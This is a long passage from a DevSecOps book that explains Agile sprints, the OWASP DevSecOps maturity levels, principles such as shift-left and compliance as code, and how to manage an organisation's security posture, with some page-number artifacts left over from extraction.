Sprints Teams who use the Agile methodology work in short periods known as sprints. Sprints can be of any length, but a typical sprint lasts 2 weeks, regardless of the team. Teams complete specific tasks during these sprints, evaluate their performance, and then work to get better in the following sprint. There are different types of scrum meetings: • Daily standup meetings: This is a very short meeting that is generally no longer than 15-20 minutes. In this meeting, all the product owners, architects, and project managers meet to check the status of the sprints. • Sprint planning meetings: In this meeting, everyone comes together to decide the duration of a sprint and the number of sprints needed to complete the task. Sprints are generally no longer than 30 days. • Sprint review meetings: These are meetings where a review is done once sprints end. These meetings showcase what has been done around the product. • Retrospective meetings: These meetings are for checking what has been done right and what has gone wrong. • Checking the backlog meetings: In this meeting, the product backlog is tracked and checked to see how soon the product backlog can be worked upon. All these meetings are headed or run by a person known as a scrum master. They organize daily stand-up meetings, reviews, demos, and other project-related gatherings. They make sure all the teams are adhering to the timeline. They are the one who tracks the progress of sprints to make sure products and projects are managed properly and on time. If there are any changes within the sprints, this can be managed and resolved after discussing this with the teams.

Teams working together The Agile methodology emphasizes teams working together to make sure we have a viable product to be delivered to clients:

7

8

Introducing DevSecOps

Figure 1.2: Agile methodology

Many sprint management tools are available to ensure the sprint goes smoothly, such as Trello boards:

Figure 1.3: Trello board

Understanding the shift from DevOps to DevSecOps

We can also use a whiteboard, where we can color-code the tasks and sprints:

Figure 1.4: Whiteboard

Agile software development evolved as a reaction to rigid software development models such as the Waterfall model. Agile methods include XP. Agile embodies many modern development concepts, including more flexibility, fast turnaround with smaller milestones, strong communication within the team, and more customer involvement. Think of XP as the ultimate team sport in the software world, but way more chill. Two coders pair up like buddy cops in a movie, working off a plan that’s crystal clear. But here’s the fun twist: customers aren’t just spectators; they’re part of the squad! Imagine a group text that never ends – that’s how much everyone’s chatting to make sure things go smoothly. We can also say that XP is like having a coding jam session where everyone – coders and customers – gets to riff together in real time.

Understanding the shift from DevOps to DevSecOps Picture DevOps as a dynamic duo of superhero teams, with developers and operations joining forces to save the business world. Their mission? Pumping out awesome apps and updates to wow the crowd. But then, DevSecOps enters the scene – a supercharged version of our dynamic duo. This time, they’ve got a new sidekick: security (Sec). By weaving Sec into the mix, we’re not just cranking out cool features; we’re making sure they’re as safe as a bank vault.

9

10

Introducing DevSecOps

DevSecOps is an extension of DevOps. DevSecOps was introduced to increase the speed of DevOps. By integrating security into DevOps processes, operations teams were motivated and measured to stabilize production to meet service-level agreements (SLAs). It was about making new changes, but they needed to be made quickly. This made it look like a lot of things were being left behind. In recent years, many organizations have evolved their DevOps practices to address their business challenges more successfully. DevOps is a contemporary method for meeting the demands of the business by delivering applications more quickly and of higher quality. DevOps now spans the entire enterprise, affecting processes and data flows and bringing about significant organizational changes. This differs from the past, where it was primarily concerned with just putting the IT services for applications in place. DevOps continues to gain momentum and evolve every passing day. New technologies are being included as part of it. The initial idea was to make sure that the communication gap between different teams during development processes could be removed. The communication gap has always been a huge challenge for organizations. Development teams work on developing the features needed by the organization, while the operations team works to make sure the application is working smoothly. At the same time, Sec comes into the picture and becomes a big bottleneck as soon as we talk about embedding security in the different phases of development. It opens up a can of worms that never ends. We are now observing the adoption of many of the techniques that are used by developers to support more agile and responsive processes. This aids organizations in determining their current situation and possible future directions. The most crucial component of any process or technology is people. Even with the best processes and technologies, results are impossible to achieve without people. Since we’re talking about DevSecOps, it starts with DevOps, which involves quickly delivering higherquality software by combining and automating the work of software development, IT operations teams, project managers, and everyone working around the development pipeline. If an organization is willing to move toward DevSecOps from its traditional model, it needs to have DevOps in place. That’s contradictory to earlier development models. Rather than relying on human intervention, the process aids in monitoring the security workflow. Additionally, it enhances our ability to identify security flaws in the ecosystem. Employees may feel replaced by automation in this way, which could make them resent giving up their current level of administrator authority. To get around the bottlenecks in the software development and deployment process, mostly on the ops side, the initial plan was to simply de-silo dev and ops.

The new processes within DevSecOps DevSecOps has changed the role of Sec in DevOps. Sec just being in the end phase and being a big hump in the way of going to production has shifted to security being in every part of the development life cycle. It entails integrating security earlier in the application development life cycle and starting

The new processes within DevSecOps

to think about infrastructure and application security right away. Additionally, it entails automating a few security checkpoints to prevent a delay in the DevOps workflow. Figuring out the right tools and processes for people can assist them in achieving their goals. Instead of security stopping the whole pipeline, it is part of each of the following phases: • Plan • Code • Build • Test • Release • Continuous deployment and decommissioning • Operate • Continuous monitoring

Figure 1.5: DevSecOps in action

We can have the best tools that money can buy but DevSecOps will not work if your team is not working. You can have the most cooperative team, but nothing will work out if you don’t have the right set of tools. Not all tools are DevSecOps-ready Not all tools can fit into a pipeline

11

12

Introducing DevSecOps

The quiet and secluded processes can not only destroy the DevOps culture but ultimately reduce the security posture of the whole organization. We can have the best tools We can have the best processes We can have the best people However, if the culture of the organization is not exercised, nothing will work This compartmentalized way of thinking not only undermines the DevOps culture but also weakens the organization’s overall security posture. The secret is to reduce process friction to a minimum. Any organization’s processes are carried out by people. DevSecOps processes, which aim to reduce the enterprise attack surface and enable effective management of technical security debt, are carried out by people using technologies. DevSecOps challenges the way traditional security teams integrate with the larger business, which is one of its most crucial aspects. If attitudes are to shift, it will take a top-down strategy to change behaviors and increase awareness at all levels of a company.

DevSecOps maturity levels Understanding maturity starts with understanding where you stand in DevSecOps. The DevSecOps maturity model illustrates how security measures can be prioritized in conjunction with DevOps tactics. By utilizing DevOps techniques, security can be strengthened. The future-focused DevSecOps maturity model directs the application of the necessary guidelines and security measures to thwart attacks. An incredible maturity model has been created by an open source community to understand the maturity of DevSecOps: the Open Web Application Security Project (OWASP) (OWASP DSOMM – https://owasp.org/www-project-devsecops-maturity-model/). There are five levels to the maturity model (https://dsomm.owasp.org):

DevSecOps maturity levels

Figure 1.6: Maturity model

13

14

Introducing DevSecOps

Many organizations have come up with maturity models that either start from level 0 or level 1. The model we’ll be looking at talks about the four levels of maturity within organizations for DevSecOps. There are many dimensions under the different categories, all of which talk about the level of maturity in the build process, testing artifacts, pinning artifacts, SBOM components, and much more. Let’s take a closer look.

Maturity level 1 Maturity level 1, within the context of the OWASP DevSecOps maturity model, represents the foundational stage of implementing security practices in your DevOps process. It’s the initial step that’s taken toward integrating DevSecOps into your organization. Maturity level 1 is where you lay the groundwork. You’re getting the team to start thinking about security, but you haven’t gone full Mission Impossible on it. Think of maturity level 1 like your first day at the gym. You’re not lifting the heavy weights just yet; you’re learning the ropes and maybe doing some light cardio. Similarly, at level 1, you’re just getting started with integrating security into your DevOps process. It’s less about having airtight defenses and more about setting the stage: think basic security checks, simple monitoring, and everyone still getting to know each other’s roles. Here’s what typically happens at this level: • Security practices: Basic security protocols and practices have been established, but they are manually executed. The methods that are employed are typically straightforward and may not fully cover all security needs. While these practices are in place, they require considerable human effort and manual intervention, which could lead to inconsistencies and errors. • Process initiation: At this level, teams start to recognize the importance of integrating security into the development process. However, practices are not yet fully structured or systematic. • Education: The team might begin learning about security threats and how to prevent them. However, education and training in secure coding practices might not be comprehensive. • Risk awareness: There’s a growing awareness of the potential risks of not integrating security fully into the DevOps process. The need for improvement is recognized, leading to the exploration of automated security measures. • Automation: While the goal of DevSecOps is to automate as many security processes as possible, at this stage, little to no automation of security tasks exists. Manual work is predominant, which can be laborious and time-consuming.

DevSecOps maturity levels

Maturity level 2 Maturity level 2, in the context of the OWASP DevSecOps maturity model, signifies a progression from the initial stage of implementing DevSecOps in an organization. It’s the point where you start to incorporate and follow security best practices more systematically. Let’s take a deeper look at this level: • Adoption of best practices: The organization starts to adopt recognized security best practices. These practices are likely documented and have become a standard part of the development process. • Continuous security: Security practices are not only implemented but are now applied continuously throughout the DevOps pipeline. This means that the security controls are not just a one-time event, but are instead consistently applied throughout the SDLC. • Partial automation: This level sees the introduction of automation, but it is not yet extensive. Certain tasks are likely automated to reduce manual effort, improve consistency, and mitigate human error. However, several security processes may still rely heavily on manual work. • Regular training: At this stage, there is likely more emphasis on educating the development and operations teams about security threats, secure coding practices, and how to use any new security tools that have been introduced. • Proactive security: There’s a shift toward a more proactive stance on security. Rather than just responding to security issues when they arise, teams are working to anticipate and prevent potential security issues.

Maturity level 3 Maturity level 3 within the OWASP DevSecOps maturity model marks a pivotal point in the evolution of an organization’s DevSecOps journey. It signifies the transition from just setting up DevSecOps practices to actively progressing toward their maturity. Level 3 comprises the following aspects: • Advanced automation: The focus at this level is largely on automation. Most security practices are now automated, which reduces manual effort, increases efficiency, and minimizes human error. Security checks and protocols become an integral part of the entire software development pipeline. • Integration of security: Security considerations are more thoroughly integrated into the DevOps process. This integration ensures that security is not an afterthought but a consistent theme from the very start of the SDLC. • Proactive and continuous: At this level, security practices are not only proactive but also continuous. It’s not about implementing measures to fix issues as they arise but about embedding security practices to prevent issues from occurring in the first place.

15

16

Introducing DevSecOps

• Regular reviews and updates: Security policies, practices, and automation scripts are regularly reviewed and updated to cope with emerging security threats and vulnerabilities. This keeps the security practices in line with the latest best practices. • Enhanced training: There’s an increased focus on training, with development and operations teams regularly educated about current and emerging security threats. They are trained to use the latest security tools and follow updated secure coding practices.

Maturity level 4 At this level, we must set up the process and keep enhancing from there via automation and other processes.

KPIs KPIs help in measuring our goals and their priority. KPIs help us get to the point we wish to reach in the stipulated time. The whole DevOps phase or DevSecOps works in tandem to move to production. It depends on us where we want to take them. Before moving toward these KPIs, we must ask ourselves some questions: • Are we testing all the application’s features before pushing them to security? • Are we educating our developers around security processes and tools, rather than forcing security upon them? • What software development processes are we following? • Do we just follow the OWASP Top 10, or have we created a certain process for that? • How frequently is security being called in the SDLC? All these questions take us to points where we can start thinking about taking our first step toward setting up the right processes and moving toward the best practices. Some of the key KPIs for DevSecOps processes are as follows: • Figuring out the amount of open source code that’s used in the code – that is, third-party libraries and dependencies. • Where do we stand on automation processes? • Are the tools aiding in having a smooth software pipeline? • Are we able to reduce the bugs in the pipeline by fine-tuning it? • How frequently are we fixing bugs?

DevSecOps – the people aspect

These are just some of the parameters you need to consider; stay tuned for more detailed information.

DevSecOps – the people aspect When we talk about DevSecOps, the focus is often on processes and tools, but people – the team members involved in implementing and managing DevSecOps – are a crucial part of this equation. In simple terms, the “people aspect” of DevSecOps is all about how individuals within an organization understand, adopt, and execute the principles and practices of DevSecOps. The following are the main elements of the people aspect of DevSecOps: • Collaboration: In DevSecOps, development, security, and operations teams need to work together closely. This might be a shift from traditional ways of working, where these groups often worked in silos. Regular communication and collaboration become key. • Shared responsibility: In the DevSecOps world, everyone shares responsibility for security – it’s not just the job of the security team. Developers, operations personnel, and others all have roles to play in maintaining security. • Education and training: People need to know about the importance of security and how to incorporate it into their daily work. This involves ongoing training about security threats, safe coding practices, using security tools, and more. • Culture shift: Adopting DevSecOps often involves a cultural shift within an organization. It requires moving toward a culture that values transparency, shared responsibility, continuous learning, and a proactive approach to security. • Empowerment: Team members should feel empowered to make decisions related to security, and should feel comfortable reporting potential issues. This requires an environment of trust and openness, where people aren’t blamed for mistakes but are encouraged to learn from them. • Skills and expertise: As security practices become more integrated into the development process, team members might need to develop new skills and expertise. This might involve learning about new tools, technologies, or methodologies. The people aspect of DevSecOps is all about creating an environment where everyone in the team understands the importance of security, is capable of contributing to it, and is committed to maintaining it as a collective responsibility. It’s about fostering a culture of collaboration, learning, and shared accountability for security. We will discuss this in more detail in the upcoming chapters.

17

18

Introducing DevSecOps

Summary DevSecOps means we’re incorporating security considerations from the very beginning, not just tackling them at the end of the SDLC. With this approach, each stage of the development process must include security as a fundamental component. DevSecOps actively brings these ideas to life. It assists organizations in developing applications securely by default. What we’re talking about here is a reshaped way of handling the SDLC – and it’s known as DevSecOps. Traditionally, security was never given priority, even at the cost of neglecting to properly educate developers. But with DevSecOps, the two go hand in hand. Understanding our current maturity level in this process gives us a sense of where we stand, and tracking KPIs allows us to measure our progress – to see where we were and where we are now, and to chart a path toward where we want to be.

Think and act Answer the following questions to test your knowledge of this chapter: • What is DevSecOps? Think about this from your own experience. • Does DevSecOps change the way you work? • Who contributes to the DevSecOps program?

Part 2: DevSecOps Principles and Processes This part covers the DevSecOps basic principles and processes involved in setting up a program, without which we cannot achieve our goal of implementing DevSecOps. This part has the following chapters: • Chapter 2, DevSecOps Principles • Chapter 3, Understanding the Security Posture • Chapter 4, Understanding Observability • Chapter 5, Understanding Chaos Engineering

2 DevSecOps Principles In this chapter, we will compare DevSecOps principles to traditional application security procedures. DevSecOps principles are the key concepts that can help us choose a DevSecOps program at any point of the event cycle and take it to the maturity stage. DevSecOps is a philosophy that blends software development (Dev), security (Sec), and operations (Ops) into a single, unified process. The ultimate goal of DevSecOps is to embed security practices into every stage of the software development process, fostering a culture of shared responsibility for security among all team members. DevSecOps is like a buddy system for your code – everyone’s got a hand in keeping it safe. Think of it as turning your tech team into a neighborhood watch, where everyone’s on the lookout, not just the “security cops.” As for “shift left,” it’s all about tackling trouble before it grows into a full-blown crisis. Picture it like catching a typo before hitting “send” on an important email. The sooner you spot it, the less of a mess you have to clean up later! Automation plays a pivotal role in DevSecOps, with security checks being automated and integrated into the development pipeline, reducing the possibility of human error and improving consistency. The DevSecOps philosophy promotes continuous security, analogous to continuous integration or delivery, with regular incremental enhancements to security controls and rapid response to security issues. Open and collaborative communication between Dev, Ops, and Sec teams is also championed in this approach, enabling effective understanding and implementation of security across all project stages. DevSecOps encourages the practice of security as code, wherein security policies, controls, and tests are codified and tracked through version control systems, ensuring easy replication and traceability. In this chapter, we will cover the following topics: • DevSecOps principles • Challenges within the DevSecOps pipeline that principles can resolve

22

DevSecOps Principles

DevSecOps principles DevSecOps practices concentrate on splitting down silos, enhancing collaboration, and, last but not least, changing security to integrate it early in the development process before moving on to production. Let’s deep dive into some key principles of DevSecOps: • Unifying the CI/CD pipeline • Fail fast automation • Empowering teams to make decisions • Cross-skilling and educating teams • Proper documentation • Relevant checkpoints • Building and managing secure dev environments and toolchains Let’s look at them in detail.

Unifying the CI/CD pipeline The sooner we can unify the CI/CD pipeline’s needs, the earlier we can enforce security controls. At the same time, we should ensure we understand what is needed in the whole pipeline – that is, tools, technology, and processes. We need to have appropriate controls in place for the pipeline and make sure everyone is aligned with them. Teams should not bring individual controls into the pipeline as this will only ensure failure. Too many cooks spoil the food.

Identify and analyze third-party component dependencies within application code A DevSecOps toolchain provides you with the tools, approaches, and analytics to target dependencies in the software code flowing via your software supply chain: • Enforce software container scanning using a tool such as software composition analysis (SCA) at critical points across your supply chain, such as when you’re verifying the containers in your private repository • Investigate the code dependencies determined in the manifest file or lock files • Track and analyze dependencies that your build process pulls into the prod environment • Examine build artifacts before they enter your private repository

DevSecOps principles

• Suitably targeting software dependencies raises the importance of the software bill of materials (SBOM) as a rich software supply chain security standard. • Effectively use DevSecOps collaboration to break down DevOps supply chain barriers DevSecOps liberates every organization’s security team from being the last stop before production. They are complementary to being more proactive at earlier stages of the software supply chain via frameworks, automated testing, and improved processes. Cooperating with the security team addresses other aspects of software security because they will deal with some additional considerations: • Installing open source software securely in the supply chain • Intaking third-party vendor technologies while conserving security and compliance • Cooperating with contractor and partner security teams to incorporate their code into the final product

Fail fast Failing fast is the way to true innovation – it helps you understand why something works or doesn’t work and then learn from it to help unravel problems faster and better. Fail fast is an empowering concept if done right. It also has the power to rework a company. Failing is different than absolute failure. It’s important to differentiate between absolute failure and sending a message stating that experimentation is “OK." Typically, people used to work on releases for a year or a few months, which, in turn, led to the redundancy of a few modules. If the modules are redundant by the time that the code is ready, it is only going to lead to a disaster. Now, the paradigm is shifting toward DevSecOps and multiple releases in a day. It allows us to understand and think about what is working and what is not working. It helps us shift our vision and path for the development process. Failing fast is also about testing whether you have got an honest enough solution to take a decision.

Automation and innovation in DevSecOps The best tools money can buy won’t help with DevSecOps if your team isn’t working, and even the most cooperative team won’t help if you don’t have the right tools – not all tools are DevSecOps-ready. Not every tool can be used with a pipeline. To facilitate rapid development, innovation, and provisioning, security practices must keep up with the agile pace of the cloud era: • Planning cycles are shorter, with more frequent deployments and more iterations as required • Deployments are becoming smaller and follow a more standardized approach through consistent pipelines

23

24

DevSecOps Principles

• A reduction in time from build to deployment is being enabled by automation and self-service • Silos are being removed from Dev and Ops teams to align their objectives and increase cohesion A compartmentalized way of thinking not only undermines the DevOps culture but also weakens the organization’s overall security posture. The secret is to reduce process friction to a minimum. Any organization’s processes are carried out by people. DevSecOps processes, which aim to reduce the enterprise attack surface and enable effective management of technical security debt, are carried out by people using technologies. Challenging the status quo is among DevSecOps’ most crucial components.

Introducing compliance checks Compliance is a critical component of DevSecOps that ensures that software development practices adhere to established standards, rules, and laws, such as HIPPA, GDPR, and others. Integrating compliance checks into the DevSecOps pipeline allows for continuous verification that software is being developed as per regulatory standards, industry guidelines, and best practices. Let’s review some of them: • Automated compliance checks: Compliance checks should be automated as much as possible and incorporated into the CI/CD pipeline. By doing this, you can ensure that any compliance issues are caught early in the development cycle, making them easier and cheaper to rectify. Automated compliance checks can include everything from static code analysis and dynamic scanning to configuration management and policy enforcement. • Continuous monitoring and auditing: Continuous monitoring and auditing of software development practices is crucial to maintaining compliance. This includes not just the code base, but also the tools, systems, and practices used in development. Automated auditing tools can be used to regularly check and report on compliance status. • Compliance as code: Just like security as code, compliance can also be defined and managed as code. This involves codifying compliance requirements into executable scripts or configuration files that can be applied across the development environment. This approach not only provides a clear and precise representation of compliance requirements but also allows for easy replication and traceability. • Shift- left compliance: Similar to security, compliance can be shifted left as well. Compliance can be done via hardening scripts post-deployment, which is known as shift right. By shifting left, developers can design and build software with compliance in mind from the outset, rather than having to retrofit it later.

DevSecOps principles

Empowering teams to make decisions Giving developers, operations personnel, and security teams the freedom to make decisions that influence the design, implementation, and maintenance of software systems is referred to as “empowering teams to make decisions” in the context of DevSecOps principles. This method encourages a culture of shared accountability, where everyone is responsible for the system’s security, from code development through deployment and continuous maintenance: • Give each member of your team the freedom and trust to make decisions for themselves. This implies that they don’t require approval for everything. Let them use their knowledge since they are the best in their field. • Communication: Ensure that everyone gets the knowledge necessary to make wise judgments. This entails maintaining open lines of communication and promoting knowledge sharing. The Dev and Ops teams should be informed if the security team comes across a new threat. • Education: Give your teams the information and instruction they need to comprehend how their choices may affect security. A developer can choose more effectively how to write code if they are aware of any potential security threats. • Responsibility: Encourage each team member to accept ownership of the software’s security. Everyone is more inclined to prioritize security if they believe it to be part of their duties. • Create a culture where input is welcomed and taken into consideration.

Cross-skilling and educating teams and the cultural aspect approach DevSecOps isn’t just about new tools and protocols; it’s about building a squad where everyone’s a stakeholder in the game of security. And remember, it’s not a one-and-done deal; it’s an ongoing jam session. Before diving in, the whole team should get comfy with the security gadgets and gizmos. Pick tools that developers will find as easy to use as their favorite apps. The goal is a smooth, not clunky, partnership between Dev and Sec. We must budget for some real-deal training. We’re all owners of the security castle here, so we must arm everyone with the keys (and know-how) to keep it safe. Success in DevSecOps is about more than just tech; it’s about vibing as a team and sharing the same ethos. If the culture doesn’t jive with the DevSecOps groove, you’re trying to mix oil and water. It’s like a band – everyone has to be in sync; otherwise, the music will be off Your strategies and rules need to be aligned like stars in a constellation. A regular health check ensures we’re not just meeting the goals but nailing them consistently. Get everyone on the same game plan, or it’s game over.

25

26

DevSecOps Principles

Invite security to the kickoff party for any DevOps project. Early chit-chats and planning set the stage for secure code that’s written like a best-seller from day one. Security hasn’t always been the star player in the app development game. Some fresh training can turn developers into all-around MVPs, rocking both code and security.

Proper documentation Think of documentation as the ultimate playbook for your team. It’s not just the “who-did-what,” but the “why-they-did-it.” With a solid script, everyone knows their lines, making it easier to put on an award-winning performance in DevSecOps. In other words, a well-documented path is a treasure map for success. It helps the team navigate the what and why behind each decision, just like footnotes in a gripping novel. So, go ahead and document like you’re writing the next big blockbuster! Let’s quickly learn about why documentation is important: • Code documentation: Clear comments within the code and detailed README files can help other developers understand the purpose of different parts of the code and how to use them. • Design documentation: This documentation captures the architectural decisions, the rationale behind choosing a particular technology stack, or how different systems interact with each other. For instance, a diagram showing how microservices interact in a distributed system can aid both developers and security teams in understanding potential security risks. • Security policies and procedures: Documenting security policies and procedures ensures that everyone knows what is expected in terms of security practices. This might include guidelines on how to handle sensitive data, rules for password creation and storage, or procedures for reporting and responding to security incidents. • Test and validation documentation: Test cases, test data, and test results should be thoroughly documented. This provides a historical record of what has been tested, how it was tested, and what the results were. For example, a report on a penetration testing exercise might include details of the methodologies used, the vulnerabilities found, and the remediation actions taken. • Incident reports: When a security incident occurs, it’s crucial to document it thoroughly. This should include details of the incident itself, how it was discovered, how it was responded to, and what steps are being taken to prevent a similar incident in the future. • Change management: Any changes to the system, especially those that affect security or compliance, should be documented. This can help trace back any issues to a particular change, making debugging and remediation easier. • Audit trails: DevSecOps emphasizes the importance of having a solid audit trail – a log of actions by a system or user. They are especially valuable in case of a security incident or during a compliance audit. They can help determine who did what, when, and why.

Challenges within the DevSecOps pipeline that principles can resolve

Relevant checkpoints The shift-left approach emphasizes the importance of addressing issues earlier to reduce cost and time. Conducting preliminary vulnerability checks before committing code, rechecking them at build time, and having the capability to block components with serious vulnerabilities are all crucial. You can also monitor components within a repository post-release to update their usage status. Developers who are new to the responsibility of their code’s security may not instantly possess the in-depth security expertise of seasoned white-hat hackers. However, investing in enhancing developers’ security knowledge and equipping them with the right tools benefits everyone. Offering secure templates and code samples that are confirmed secure is a good starting point. If something goes awry, the DevSecOps team can adopt a quality assurance mindset and prioritize security in fixing the issues. At the same time, security engineers can provide advice on best practices for coding applications and configuring infrastructure. This can help minimize flaws and guide corrective actions to fix any bugs found in subsequent testing stages.

Building and managing secure Dev environments and toolchains Future development environments must be integrated with security standards and guidelines via an integrated development environment (IDE) to support DevSecOps industrialization, putting together an onboarding program for developers that trains new hires on your work environments, tools, and procedures, along with the ITSec policies. Over and above the onboarding training, offer the developer team a refresher course and ongoing instruction. With involvement from your Dev, Ops, and cybersecurity teams, security for your DevSecOps toolchain should be a constant priority.

Challenges within the DevSecOps pipeline that principles can resolve With Dev, Ops, and Sec, we’ve got a lot of hands touching the code. This could create chaos, but DevSecOps makes sure everyone’s working from the same recipe. Shared responsibility means less finger-pointing and more high-fiving. Traditional models often slap on security measures at the end, making it a frantic game of catch-up. DevSecOps principles such as shift left say, “Why wait?” By baking security in from the get-go, you’re not just avoiding a disaster – you’re planning for success. No one likes to be bogged down by bureaucratic procedures when you’re trying to move fast. DevSecOps helps by automating security protocols. This means you can sprint without tripping over paperwork. Also, the Dev team and the Sec team sometimes seem like they’re speaking different languages. DevSecOps bridges this gap, turning that miscommunication into a harmonious duet. When everyone’s on the same page, it’s easier to belt out hits.

27

28

DevSecOps Principles

Let’s look at the different challenges in detail.

Continuous application changes In DevSecOps, one of the major challenges is managing continuous application changes. These changes occur due to the iterative and dynamic nature of DevOps practices, where updates and modifications to the code occur frequently and consistently. The following details provide a deeper understanding of this challenge: • High-speed iterations: DevOps practices encourage rapid development and deployment, which can lead to frequent changes in the application. While this can enhance efficiency and responsiveness, it also introduces a risk of security vulnerabilities being overlooked in the process. • Integration complexity: With the application continually evolving, integrating new features or code changes can become complex. Each integration has to be checked for potential security risks to ensure that new vulnerabilities aren’t introduced into the existing system. • Change management: The dynamic nature of the application requires effective change management. A slight oversight can lead to inconsistencies or malfunctions within the application, or even worse, expose new security loopholes. • Dependent systems: Frequent changes can affect the dependent systems or components, potentially breaking their functionality or exposing them to security risks. • Continuous testing: With continuous changes, the application needs to be continuously tested to ensure that new features or modifications do not introduce security vulnerabilities. This can be resource-intensive and may cause a delay if it’s not done in an automated and efficient manner.

The developer knowledge gap With cyber security and data protection being prioritized over the last decade, it might be reasonable to consider that secure code practices should be followed by developers. This knowledge gap is an obstacle to any attempt to move security left, so your DevSecOps approach requires managing it using a combination of the following: • Application security (AppSec) training • Security champions, which involves training developers to sit within a development team to mentor and assist with secure development and mitigation activities

Summary

Lack of AppSec tool integration A significant hurdle within the DevSecOps pipeline is the lack of proper integration of AppSec tools. This problem arises due to various factors and has several implications, as explained here: • Limited coverage: AppSec tools are essential for identifying security vulnerabilities in your applications. However, without proper integration into the DevSecOps pipeline, these tools may not provide complete coverage for your applications. This can result in unidentified vulnerabilities that can be exploited by attackers. • Workflow disruption: Without seamless integration, security tools might disrupt the DevOps workflow. For instance, developers may have to manually initiate scans or interpret results, which takes time away from coding and other crucial tasks. This disruption can slow down the development process and create friction between the Deb and Sec teams. • Delayed feedback: If security tools aren’t fully integrated into the pipeline, there could be significant delays in receiving feedback about potential security issues. This delay means that developers might have already moved on to other tasks before learning about vulnerabilities that need to be addressed, making it harder and more time-consuming to correct the issues. • Reduced efficiency: Without the proper integration of AppSec tools, teams may need to spend unnecessary time and effort on tasks that could be automated, such as manually triggering scans or sorting through false positives. This extra work reduces the team’s efficiency and can lead to slower delivery times. • Inconsistent use: If AppSec tools aren’t an integral part of the DevSecOps pipeline, their use may become inconsistent. Some developers may skip using the tools due to time constraints or forgetfulness, leading to potential vulnerabilities going undetected.

Summary In the realm of software development, an imaginary organization, TechFuture, has been creating innovative applications. However, they’ve realized that integrating security throughout their development life cycle could dramatically improve their products and minimize vulnerabilities. They've decided to implement DevSecOps principles. By embracing DevSecOps principles, TechFuture is able to build more secure applications, respond more quickly to security incidents, and foster better collaboration among their teams. They realized that DevSecOps was not just about tools and processes, but more about a cultural shift toward shared responsibility and proactive security practices. In this chapter, we explored the different DevSecOps principles and learned about the challenges within the DevSecOps pipeline. In the next chapter, we will understand the security posture.

29

3 Understanding the Security Posture DevSecOps is one area that is having an all-time boom for organizations. Alternatively, we can say that DevSecOps is an increasingly critical area for organizations. Every organization wants to move toward or shift toward using DevSecOps processes, tools, and technologies. The immense changes in the applications and the code led to a big change in the way we used to work with the code. Stakeholders want to have new functionalities and features with lightning speed. However, while we are shifting gears toward DevSecOps, we need to look at a big horizon. While transitioning to a cloud-native approach offers advantages, it also introduces significant risks. The way we are adopting with lightning-fast speed, we are missing out on understanding what goes into designing a secure environment, and now, we are talking about the Internet of Things (IoT), Operational Technology (OT), and dependencies, it becomes imperative to understand the ecosystem very well. For example, let’s say we have a house and there are four doors and four windows. It is important to understand the risks behind leaving any of these open. Likewise, it is important to understand the code that is built in-house and the code that is open source. This also includes third-party vendors, tools, APIs, and any microservices in use. While being part of the Dev team as well as the Sec team, I got the opportunity to understand how the ecosystem works, as well as the friction between both teams. The Dev team needs to understand the security in the ecosystem, and the Sec team becomes the showstopper. If we need to get things streamlined, everyone (DevOps, Sec, and the QA team) needs to work together. That, in turn, means understanding where we stand in terms of vulnerabilities.

32

Understanding the Security Posture

Developers are expected to have a comprehensive understanding of both development and security aspects, including the following: • Security tools • New vulnerabilities • Tracking to fix security bugs This can only be done when we have the right information about the security posture within the organization, as well as what assets and code we have within the organization. We will cover the following main headings in this chapter: • Understanding your security posture • Why and what measures we take to secure the environment • What measures can we take to monitor an environment? • Where does security stand in the whole development process?

Understanding your security posture In DevSecOps, posture management focuses on identifying security issues and addressing unresolved concerns early: • The development pipeline is an automated process that facilitates code deployment to production • Within the deployment pipeline, we have steps defined to perform the actions to reach the production stage • Development pipeline needs to be secured by understanding the right posture. This means the tools, technologies, and people involved • It entails understanding any associated third-party vendors or risks from the vendor

Regular meetings DevSecOps pipelines are automated, but regular meetings among team members are essential for alignment and collaboration. Having a regular cadence to know where we stand and to make sure we are on the right path is important to be on top of things and the development pipeline. At the same time, it is important to understand where to stop and change gears. You can’t move on unless you find the piece of the puzzle that would fit in your puzzle to complete it.

Why and what measures we take to secure the environment

Managing pipelines Pipelines should be structured and managed similarly to a story, with distinct chapters and subsequent pages. Likewise, a pipeline has multiple stages, and stages have different actions. It needs to be managed to give everyone the same view. We need to understand when a new page is added to the chapter of the phase – that is, whether a tool can be added to the code review process.

Testing pipelines Test the pipeline to ensure you have a clear vision of what is working out and what is not. Often, scanning the applications in the functional testing stage is called dynamic testing. This phase should not be a road blocker. Instead, pass the pipeline but keep the vulnerability report for fixes – that is, with more maturity, the pipeline can be used to block the vulnerabilities from going into production and breaking the pipeline but not during the early stages.

Tools involved in pipelines Effective tool management is crucial in DevSecOps to determine which tools are integrated into the CI/CD pipeline and which are used for offline analysis. For instance, secret scanning should be integrated as a pre-commit hook to prevent sensitive data from being committed. Now, let’s understand why we must get into security posture management. Security posture management is a crucial component of any organization’s cybersecurity strategy. The term security posture refers to the collective security status of an organization’s software, data, networks, and computer systems. A strong security posture helps in identifying, protecting, detecting, responding to, and recovering from the functions of an organization’s cybersecurity program. Let’s look at why it’s important to manage your security posture effectively.

Why and what measures we take to secure the environment Posture management helps in securing our DevSecOps environment. It helps in evaluating the issues that can happen in the development pipeline. It also emphasizes monitoring applications. It’s essential to continuously audit the DevOps pipeline to identify potential vulnerabilities, misconfigurations, or human errors. Pipelines can also be measured, and as much automation can be done as possible. It can give us a glimpse of the DevSecOps posture and the risks associated with it from a bird’s-eye view. Understanding this will help us understand the threats and risk exposure for the application or software.

33

34

Understanding the Security Posture

Building the vulnerabilities inventory The inventory of vulnerabilities, also known as the artifactory, can be a gold mine in terms of vulnerabilities. Vulnerabilities from all sources need to be kept in one place for better tracking.

Addressing vulnerabilities It is important to fix vulnerabilities. If we do not fix them, there is no point in building a list of them. A lot of people have asked me how they should address having a huge pile of security issues; ownership is also a big challenge. The simple mantra to work on this would be to bring all the teams together and start assigning ownership. Starting with the Sec team, help them recognize the severity or priority of vulnerabilities, and for the Dev team, help them fix the vulnerabilities based on their priority.

Parameters to define the security posture The DevSecOps landscape continues to grow because of new technologies in containers, data storage services, and API gateways. We can’t use single evaluation criteria to effectively measure the secure posture of an environment. We need to have multiple mechanisms to evaluate and measure its posture. To do this, we need to gather the right amount of data.

Discovering the third-party component What should you do if you discover issues in third-party components? For example, what happens when you rely on a vendor or if there is no patch/update available?

Measuring the effectiveness of the technologies used We can use as many technologies as we can. However, measuring their usefulness is a key area of DevSecOps. Often, organizations buy a tool as if it’s the talk of the town. This becomes a disaster if it doesn’t match what we need. It also emphasizes what the tool is and how it performs.

